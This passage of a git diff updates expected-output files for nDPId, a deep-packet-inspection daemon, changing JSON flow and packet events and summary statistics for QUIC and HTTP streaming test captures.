pYeUYQ6T838f5KeN4CcXxx7FVrW0hCqLV+HJCGz2o\/AeBkwyRwIR35fIDm64HoUOpCMEB3l7n2WMd9lZS2DQtlFlThLuIymsnTAeZZCutQ7DJyF72B2wkJ9WAmyRaM7Nq+x0zpTQHmxR9xaamH9bBNq6ua2oCT5qfTkzoaG+IHmszzghAt5peXz7eqEaFqSW9OSi6Rt7nXeWpRnZS0xwrMxUtgUDclrW\/KBEJo0yZx1nkaOYHw9iwtzDJs2GBWmR94yQl7wvUuGIY6KjXTfn457StRyrcmSAcZVTUGxz7jG3KLfU2hiD2i+hGp67x8HUPue8RVimCp3M+CVhljP3AEXbJYiKYJq17hw\/NXXqU+vH3l4Ac+JioVTo5Q3+FwrWO7xRdRizXH89EUM4LwVRIVqhBY5DmxiNvI\/yxCgFw19mN2hP7yR4ixoyVHHevKc24iODyxhVIi2laJWFJ5DG5knu8grskOXH1flWjfxJBK\/\/3jC1BdMicLllb+efDa9SzMy\/3dPDg61ZXUXioRNvGC9lAdQLPrOxjvJhrN1U4tovGRi4vfa\/M+cLnYZdFxrakeiE5p5Ge8ewqhhgDnypGVxiKqOhWMtyl1pD7cCSKY+KDEUtztnzSKJJP5e5q2vmnfhsLtwxqp4YcMsGrDdwcy+whkFVB73zRViDcA8nfxNKx3ksom\/BzlnliiQ1AdXWXCf1pFpesZUDEc3UwYuqXdIonQnRDiCYrlhZ4tAO39+6nh8o7UbXxKCT7JVAC8TwzVqp8T9mo3m+mofsKgSIEYSKy38vRMDGMM9v4WJ+IK5iuL78dmEipzGMd1w89fuz3c5cxVfZRr1V7++wg3gzWDHZREzG0PMXkvJzh3OJ9rs93FmzU64537zWQLvOws8sCivE3d4H+qISlUIyJMOC5xzhRlbFKhIzWtB8ba5COlFqmJ\/NM="} -00575{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":353,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","packets-captured":353,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":709,"global_ts_msec":1593498297036} +00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1593498296832,"flow_last_seen":1593498296832,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1593498296832,"l3_proto":"ip4","src_ip":"10.230.40.168","dst_ip":"94.97.225.146","src_port":62196,"dst_port":443,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +02105{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1593498296832,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1260,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":1260,"pkt_l4_len":1240,"thread_ts_msec":1593498296832,"pkt":"RTgE7B0GAABAEeVBCuYoqF5h4ZLy9AG7BNgTGcP6zrABCEACR1YBz3h7AABEvkgDSkdXT8KDRtZ6SuR9aklyes\/l4Sioa5nXAcPGveAb5Mb0k7uBERsrnzBa9uno+scwKQJ+8HaE7SwNRWaJ0B+VYq5sgzaHE9BksItfZB05b19PkWz3XaOJPeabOxbegkEde\/7BgQc2iMQiMZifq3YQkFbpelKpfZ8UxZbKFKO8T8enNpDFvm79StOLsc58r6VUI7R7RX2Dh+7UvHc8w55LVS4nFdKyvt+gLMAzuTrAqSRX04ucEX43SZLKcpJ+X+iK\/v9u1yLmGT\/8hHS\/A3VBUuWVRkAqUr3zRxflhV5CjsXky9idxKWm4C9Pn6cw4624LuYteYIUWOTHQHv3zV5\/rnXQxed5aHO337llijw0yLFxpnpOUEtoxTKtZZeNyR3\/hCIkY3n14k3gHfYXZl5t7DMoJYBnIHHhmdFCOK4sdCcKtpOlPKhDiv0BdCMImPxwr5CZ3d0NvKvNFKbylEYXGyw6diXHrADpP1Bpo7IsDo6OECekYHLzamw7fo5GRjTg4wyZ585sRHNOY5UQ14urjp6qTgyJaK+bJQKQXSG\/jPsJRoA3bT9RYwhd92VXr\/SRpMsMI1dgiAabVuN6aapjwqQ05GcX1xWXUOswELHBWeda+RZSG0ealfCxTmgk\/LmTIARNNTXtxke0sf\/IlfnV3ikcr9NqDIrI6of1G3cZfUQGBWE6gBVL5hH\/8pDG4T4ZpNiYz4Y0kEK9VRD1GZ0w6BCqlt\/kg2zd6ahgaI4n0T7BllqMO01YZ1t9pyXJShYy7a1\/GE3TCKsHNgIVU+OzGaBubO2O8foCsTRqluuqUPhG3n2E8MHmbHfrbqadkpRwbm5mHSUiRHvHPOMZ3uD3xF6j764aqPOQrl01dj1iQP+qGIcEY5l4ogPeALtV3hU5f7bpvLSDPKVoHsWvz++bxVzr7sgAnGREUzsxKt4SUYuRzz53icFmvd9rxNmgOaF+PEw\/dQIcNJqpxX8ulzLr4tUIjHsZy8Y3w0WHWlRvXX5BFt\/FNL6D1z9p+LMmNXuSPqVvh56LVqzeEf7uD4SQyYHHodFZUSZh4UJZfGLFC0eeFNy2qBWMNwCptrLdwN5PCZlQ07ewM1OmYFXib\/9zYOSk4B0N24Ml1I3V+BUt9Q\/f7In0Lo1bYVhzoFFJnm1wIhEDEaXvsKWXwZTHPIpl1Hz1I\/6Yq3hsX1N3dtM00S1An2mdoc9+06efV9TeSDkQwX8r+ZabNOKTRtHqXDe1Wl+aE\/ZahNHsuY3HnDuGINcHsBCTv1ovOmoDAi0RUdYM0lPaGHSMu61RpKW5cRQ0Cdy0+WZXfm0NBcMkEOs1K83zDl3Ni0ybs6vWiqa45kxw7H1vC362nLorQvhZdy7wTrE4RWiFGT0Xccp4Rl8QprALjpWqFcS7MPnifCUJZzLuwLuogz6ePAO7YscFlIza4b2sSjihSJrD9QLuOyhifjzSEn4amVk5ivqXVE+QZ1R7NVlYJU0wlh1SwakKVblsHRVpjkjVrp5to9V854cET1W0se7gIi2a7oXoLvW8CT8NdthxNrd\/AUaazo7KSGS96THBAG+HmraPSIMT5EEnSDc\/KXc1EWvMFe0xKOugeQC4v6tFGa5dLsgNI0TE"} +00676{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1593498296832,"flow_last_seen":1593498296832,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1593498296832,"l3_proto":"ip4","src_ip":"10.230.40.168","dst_ip":"94.97.225.146","src_port":62196,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}} +00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1593498296833,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":106,"pkt_l4_len":86,"thread_ts_msec":1593498296833,"pkt":"RQAAapbBAABAEXBACuYoqF5h4ZLy9AG7AFbkKub6zrABCEACR1YBz3h7AD4ztLOg+8\/NWUDesKp0sDyq9wl\/qnK\/iaP4qknLwsMfEkvd24lrwL0JnOo2eK80vHLhCKIp2AiTqDI94jB8\/Q=="} +00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1593498296833,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":106,"pkt_l4_len":86,"thread_ts_msec":1593498296833,"pkt":"RQAAapbBAABAEXBACuYoqF5h4ZLy9AG7AFbkKub6zrABCEACR1YBz3h7AD4ztLOg+8\/NWUDesKp0sDyq9wl\/qnK\/iaP4qknLwsMfEkvd24lrwL0JnOo2eK80vHLhCKIp2AiTqDI94jB8\/Q=="} +00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":353,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":353,"flow_first_seen":1593498296832,"flow_last_seen":1593498297036,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":390606,"flow_avg_l4_payload_len":1106,"midstream":0,"thread_ts_msec":1593498297036,"l3_proto":"ip4","src_ip":"10.230.40.168","dst_ip":"94.97.225.146","src_port":62196,"dst_port":443,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00580{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":353,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","packets-captured":353,"packets-processed":353,"total-skipped-flows":0,"total-l4-data-len":390606,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1593498297036} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ -~~ packets captured/processed: 353/0 +~~ packets captured/processed: 353/353 ~~ skipped flows.............: 0 -~~ total layer4 data length..: 0 bytes -~~ total detected protocols..: 0 -~~ total active/idle flows...: 0/0 +~~ total layer4 data length..: 390606 bytes +~~ total detected protocols..: 1 +~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5099937 bytes -~~ total memory freed........: 5099937 bytes -~~ total allocations/frees...: 113310/113310 +~~ total memory allocated....: 5121126 bytes +~~ total memory freed........: 5121126 bytes +~~ total allocations/frees...: 113685/113685 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ json string min len.......: 201 chars -~~ json string max len.......: 2037 chars -~~ json string avg len.......: 1119 chars +~~ json string min len.......: 486 chars +~~ json string max len.......: 2110 chars +~~ json string avg len.......: 1285 chars diff --git a/test/results/quickplay.pcap.out b/test/results/quickplay.pcap.out index cb1c49b8b..9d8bbc2f0 100644 --- a/test/results/quickplay.pcap.out +++ b/test/results/quickplay.pcap.out @@ -1,123 +1,123 @@ 00460{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"quickplay.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quickplay.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1429000030398} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000030398,"flow_last_seen":1429000030398,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1429000030398,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50668,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00873{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1429000030398,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":368,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":368,"pkt_l4_len":332,"thread_ts_msec":1429000030398,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAWBDAUAAPwaoIQo2qfp4HCMpxewAUEHDiNf6xwiBUBgAc22rAABHRVQgL3NvbHIvUmVzdEFwaVNpbmdUZWxfUEgvcmVzdGFwaS9jYXRlZ29yaWVzL0hVRD9hcGlLZXk9cXdlcnR5JmRldmljZT1hbmRyb2lkbW9iaWxlJmxvY2FsZT1lbmcmbmV0d29yaz1XSUZJJnBhZ2VOdW1iZXI9MSZwYWdlU2l6ZT01MCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogRGFsdmlrLzEuNi4wIChMaW51eDsgVTsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgTUlVSS9WNi40LjIuMC5LWERNSUNCKQ0KSG9zdDogYXBpLXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="} -00983{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000030398,"flow_last_seen":1429000030398,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1429000030398,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50668,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"api-singtelhawk.quickplay.com","url":"api-singtelhawk.quickplay.com\/solr\/RestApiSingTel_PH\/restapi\/categories\/HUD?apiKey=qwerty&device=androidmobile&locale=eng&network=WIFI&pageNumber=1&pageSize=50","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} -02237{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1429000030498,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1380,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1380,"pkt_l4_len":1344,"thread_ts_msec":1429000030498,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBVSmuUAArQbSWHgcIykKNqn6AFDF7PrHCIFBw4oPUBgIIgJuAABIVFRQLzEuMSAyMDAgT0sNClNlcnZlcjogQXBhY2hlLUNveW90ZS8xLjENCkxhc3QtTW9kaWZpZWQ6IFR1ZSwgMTQgQXByIDIwMTUgMDc6MTg6NTQgR01UDQpFVGFnOiAiWW1JNE1EQXdNREF3TURBd01EQXdNRk52YkhJPSINCkNvbnRlbnQtRW5jb2Rpbmc6IGd6aXANClZhcnk6IEFjY2VwdC1FbmNvZGluZw0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctT3JpZ2luOiAqDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1IZWFkZXJzOiB4LXJlcXVlc3RlZC13aXRoDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1NZXRob2RzOiBQT1NULCBHRVQsIE9QVElPTlMsIERFTEVURQ0KWC1DbmVjdGlvbjogY2xvc2UNCkNhY2hlLUNvbnRyb2w6IHB1YmxpYywgbWF4LWFnZT0xMzg2DQpFeHBpcmVzOiBUdWUsIDE0IEFwciAyMDE1IDA4OjUwOjE2IEdNVA0KRGF0ZTogVHVlLCAxNCBBcHIgMjAxNSAwODoyNzoxMCBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vanNvbjtjaGFyc2V0PVVURi04DQpDb250ZW50LUxlbmd0aDogNzg1DQoNCh+LCAAAAAAAAADkV89v0zAYve+vsHrgNFDbgUDcyrpuYoyhtfSCOHxNvqZmjh35x0ap+r9jp2mXNIlbzRwQXCr1+17ynv3s+Hl1QgjpLBBilJ33ZOX+uorSoI2ylY4yUYRKdU63rQwS\/GzSWf5Ar1Ie019oi2+6u6oWGtgFwxS5dq87q3a+2Idcueeq67zXSYHyO1TCyAjLkmS95so0diqvvg53CsvgyTJzD3Qi0JgIuayAmIiA5W3kSaUDWssJJK4VowbKVKXNIcUm1hhVJGmmqeB528TkvIn4HpePQsZu5N+eyq7j3vhU+V5+CDnMGA6lyIbikd8gz\/3R0mBVwhwM07dyY2j3Vbf+jkvkEkeU6RwyB6awDvoEPDHWHg\/up0YeYzywk0VnRudOrtYFYr1zeg4R5uaXbUuchtr4V5V\/xVS5qRxEblIH8YNdR8Y+eFoDbj3ZIMkL4gNHwnBt0f1KZ316pBhOU8hN9sjwYMLYz0WK8dJD3QoI4x2KyLhtDNJH7kcFKpCQgo+7pR\/GemnfPl6IR+VhdhjSBgqjvxJSCunhbgWE8V7TWI0gpczntgPZrdaKC5NwA1JTYAOp1TgT9tejpMASB7aKWvFhiu4QGNXLydSjpMCQRlAgvUiBR76vXzsijHkc0REdgd3XyrceLOzliJJ2YJiKyUJSxtC3GzyQMO4pSIp6ecHtaWgTAXcfOY+OAk4O4beielVRLRmAFYfy8QfnXrLZU3nBE0bVwqOr+6zJSmTPw\/pBMGYDkIj\/OO+PzHcmf4QMOCrf7ngerU6Yb0lCAkw02RDGeu89Fq6FRPClj27rijsplYpQbtM95TbKxttkXs6u9Th+Ix4oVjNzYCLPQBZXiEML\/xiiithq5ibtu690K7C7RtM9ibujqD7447J7UzpvxtTC+T6Mm\/R2Pjazsl391\/3tp2+3xOrWTaa1HPMfeTeZkjHKv9K+3tuzw+65QOa1TmUY2Zz07zlXG3mzaS233eddiY+yrf+u\/D3dDK0zF2LzCntfXv8GAAD\/\/wIMAEf8Fz+FEQAA"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000030766,"flow_last_seen":1429000030766,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1429000030766,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50669,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00874{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1429000030766,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":368,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":368,"pkt_l4_len":332,"thread_ts_msec":1429000030766,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAWA50EAAPwaxUgo2qfp4HCMpxe0AUOei8\/4RmPGFUBgAc1zOAABHRVQgL3NvbHIvUmVzdEFwaVNpbmdUZWxfUEgvcmVzdGFwaS9jYXRlZ29yaWVzL0hVRD9hcGlLZXk9cXdlcnR5JmRldmljZT1hbmRyb2lkbW9iaWxlJmxvY2FsZT1lbmcmbmV0d29yaz1XSUZJJnBhZ2VOdW1iZXI9MSZwYWdlU2l6ZT01MCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogRGFsdmlrLzEuNi4wIChMaW51eDsgVTsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgTUlVSS9WNi40LjIuMC5LWERNSUNCKQ0KSG9zdDogYXBpLXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="} -00983{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000030766,"flow_last_seen":1429000030766,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1429000030766,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50669,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"api-singtelhawk.quickplay.com","url":"api-singtelhawk.quickplay.com\/solr\/RestApiSingTel_PH\/restapi\/categories\/HUD?apiKey=qwerty&device=androidmobile&locale=eng&network=WIFI&pageNumber=1&pageSize=50","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} -02237{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1429000030832,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1380,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1380,"pkt_l4_len":1344,"thread_ts_msec":1429000030832,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBVReB0AArQYbC3gcIykKNqn6AFDF7RGY8YXnovU2UBgIIvGQAABIVFRQLzEuMSAyMDAgT0sNClNlcnZlcjogQXBhY2hlLUNveW90ZS8xLjENCkxhc3QtTW9kaWZpZWQ6IFR1ZSwgMTQgQXByIDIwMTUgMDc6MTg6NTQgR01UDQpFVGFnOiAiWW1JNE1EQXdNREF3TURBd01EQXdNRk52YkhJPSINCkNvbnRlbnQtRW5jb2Rpbmc6IGd6aXANClZhcnk6IEFjY2VwdC1FbmNvZGluZw0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctT3JpZ2luOiAqDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1IZWFkZXJzOiB4LXJlcXVlc3RlZC13aXRoDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1NZXRob2RzOiBQT1NULCBHRVQsIE9QVElPTlMsIERFTEVURQ0KWC1DbmVjdGlvbjogY2xvc2UNCkNhY2hlLUNvbnRyb2w6IHB1YmxpYywgbWF4LWFnZT0xMzg2DQpFeHBpcmVzOiBUdWUsIDE0IEFwciAyMDE1IDA4OjUwOjE2IEdNVA0KRGF0ZTogVHVlLCAxNCBBcHIgMjAxNSAwODoyNzoxMCBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vanNvbjtjaGFyc2V0PVVURi04DQpDb250ZW50LUxlbmd0aDogNzg1DQoNCh+LCAAAAAAAAADkV89v0zAYve+vsHrgNFDbgUDcyrpuYoyhtfSCOHxNvqZmjh35x0ap+r9jp2mXNIlbzRwQXCr1+17ynv3s+Hl1QgjpLBBilJ33ZOX+uorSoI2ylY4yUYRKdU63rQwS\/GzSWf5Ar1Ie019oi2+6u6oWGtgFwxS5dq87q3a+2Idcueeq67zXSYHyO1TCyAjLkmS95so0diqvvg53CsvgyTJzD3Qi0JgIuayAmIiA5W3kSaUDWssJJK4VowbKVKXNIcUm1hhVJGmmqeB528TkvIn4HpePQsZu5N+eyq7j3vhU+V5+CDnMGA6lyIbikd8gz\/3R0mBVwhwM07dyY2j3Vbf+jkvkEkeU6RwyB6awDvoEPDHWHg\/up0YeYzywk0VnRudOrtYFYr1zeg4R5uaXbUuchtr4V5V\/xVS5qRxEblIH8YNdR8Y+eFoDbj3ZIMkL4gNHwnBt0f1KZ316pBhOU8hN9sjwYMLYz0WK8dJD3QoI4x2KyLhtDNJH7kcFKpCQgo+7pR\/GemnfPl6IR+VhdhjSBgqjvxJSCunhbgWE8V7TWI0gpczntgPZrdaKC5NwA1JTYAOp1TgT9tejpMASB7aKWvFhiu4QGNXLydSjpMCQRlAgvUiBR76vXzsijHkc0REdgd3XyrceLOzliJJ2YJiKyUJSxtC3GzyQMO4pSIp6ecHtaWgTAXcfOY+OAk4O4beielVRLRmAFYfy8QfnXrLZU3nBE0bVwqOr+6zJSmTPw\/pBMGYDkIj\/OO+PzHcmf4QMOCrf7ngerU6Yb0lCAkw02RDGeu89Fq6FRPClj27rijsplYpQbtM95TbKxttkXs6u9Th+Ix4oVjNzYCLPQBZXiEML\/xiiithq5ibtu690K7C7RtM9ibujqD7447J7UzpvxtTC+T6Mm\/R2Pjazsl391\/3tp2+3xOrWTaa1HPMfeTeZkjHKv9K+3tuzw+65QOa1TmUY2Zz07zlXG3mzaS233eddiY+yrf+u\/D3dDK0zF2LzCntfXv8GAAD\/\/wIMAEf8Fz+FEQAA"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000031075,"flow_last_seen":1429000031075,"flow_idle_time":7440000,"flow_min_l4_payload_len":302,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":302,"flow_avg_l4_payload_len":302,"midstream":1,"thread_ts_msec":1429000031075,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.18","src_port":33064,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00861{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1429000031075,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":358,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":358,"pkt_l4_len":322,"thread_ts_msec":1429000031075,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAVYEaUAAPwYE2wo2qfp4HAUSgSgAUG4ezi+GqNXzUBgAc8tUAABHRVQgL3NvbHIvUmVzdEFwaVNpbmdUZWxfUEgvcmVzdGFwaS9ob21lP2FwaUtleT1xd2VydHkmZGV2aWNlPWFuZHJvaWRtb2JpbGUmbG9jYWxlPWVuZyZuZXR3b3JrPVdJRkkmcGFnZU51bWJlcj0xJnBhZ2VTaXplPTUwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBEYWx2aWsvMS42LjAgKExpbnV4OyBVOyBBbmRyb2lkIDQuNC40OyBNSSAzVyBNSVVJL1Y2LjQuMi4wLktYRE1JQ0IpDQpIb3N0OiBhcGktc2luZ3RlbGhhd2sucXVpY2twbGF5LmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg=="} -00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000031075,"flow_last_seen":1429000031075,"flow_idle_time":7440000,"flow_min_l4_payload_len":302,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":302,"flow_avg_l4_payload_len":302,"midstream":1,"thread_ts_msec":1429000031075,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.18","src_port":33064,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"api-singtelhawk.quickplay.com","url":"api-singtelhawk.quickplay.com\/solr\/RestApiSingTel_PH\/restapi\/home?apiKey=qwerty&device=androidmobile&locale=eng&network=WIFI&pageNumber=1&pageSize=50","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} 